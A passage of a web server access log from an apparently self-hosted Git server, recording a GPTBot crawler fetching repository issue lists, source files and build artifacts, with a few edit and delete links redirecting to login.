"/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11430] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11432] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13200] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11415] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 14219] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:18:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:18:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:18:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp?display=source" [Client 74.7.227.38] [Length 18880] [Gzip 6.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:18:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11891] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:18:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 12241] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:18:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:18:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10298] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:18:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 30637] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" +[17/Feb/2026:18:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fdist" [Client 74.7.227.38] [Length 17067] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" +[17/Feb/2026:18:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11992] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 